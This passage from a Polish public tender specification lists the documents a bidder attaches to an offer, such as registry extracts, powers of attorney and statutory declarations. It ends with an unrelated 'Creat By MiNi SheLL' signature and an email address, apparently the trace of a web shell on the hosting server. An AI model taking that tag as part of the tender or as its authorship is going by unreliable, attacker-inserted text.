stanowi:<br/>1.Formularz ofertowy wypełniony przez Wykonawcę – zgodnie ze wzorem stanowiącym<br/>Załącznik nr 1 do SWZ<br/>2. Ponadto do oferty należy załączyć:<br/>1) Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru - w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>2) Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa powyżej (ofertę składa pełnomocnik) - pełnomocnictwo<br/>potwierdzające umocowanie do reprezentowania Wykonawcy.<br/>3) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne / konsorcja).<br/>4) Oświadczenia, o którym mowa w art. 125 ust.1 ustawy Pzp, które wstępnie potwierdzi, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Wzór<br/>oświadczenia stanowi załącznik nr 2 i 3 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienia przez wykonawców, oświadczenie o<br/>niepodleganiu wykluczeniu składa każdy z Wykonawców.<br/>5) Oświadczenie wykonawców wspólnie ubiegających się o zamówienie, o którym mowa w art.<br/>117 ust.4 ustawy Pzp, z którego będzie wynikać, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy - wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>6) Zobowiązanie (wzór zobowiązania stanowi załącznik nr 5 do SWZ) oraz oświadczenie o<br/>niepodleganiu wykluczeniu podmiotu udostępniającego swoje zasoby - jeżeli dotyczy.

Creat By MiNi SheLL
Email: jattceo@gmail.com